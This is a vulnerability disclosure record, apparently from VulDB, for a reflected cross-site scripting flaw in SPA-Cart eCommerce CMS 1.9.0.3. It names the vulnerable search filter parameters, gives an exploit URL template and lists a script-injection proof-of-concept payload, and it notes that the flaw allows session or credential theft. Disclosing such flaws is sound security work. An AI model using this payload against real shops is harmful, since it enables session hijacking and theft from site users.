| Title | SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS |
|---|
| Description | # Exploit Title: SPA-Cart eCommerce CMS x.x.x.x - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /search
GET parameter 'filter[brandid]' is vulnerable to XSS
GET parameter 'filter[price]' is vulnerable to XSS
https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB
XSS Payloads:
vnxjb"><script>alert(1)</script>bvu51
[-] Done |
|---|
| User | skalvin (UID 49463) |
|---|
| Submission | 08/20/2023 20:22 (3 years ago) |
|---|
| Moderation | 08/25/2023 17:40 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 238058 [SPA-Cart eCommerce CMS 1.9.0.3 /search filter[brandid]/filter[price] cross site scripting] |
|---|
| Points | 17 |
|---|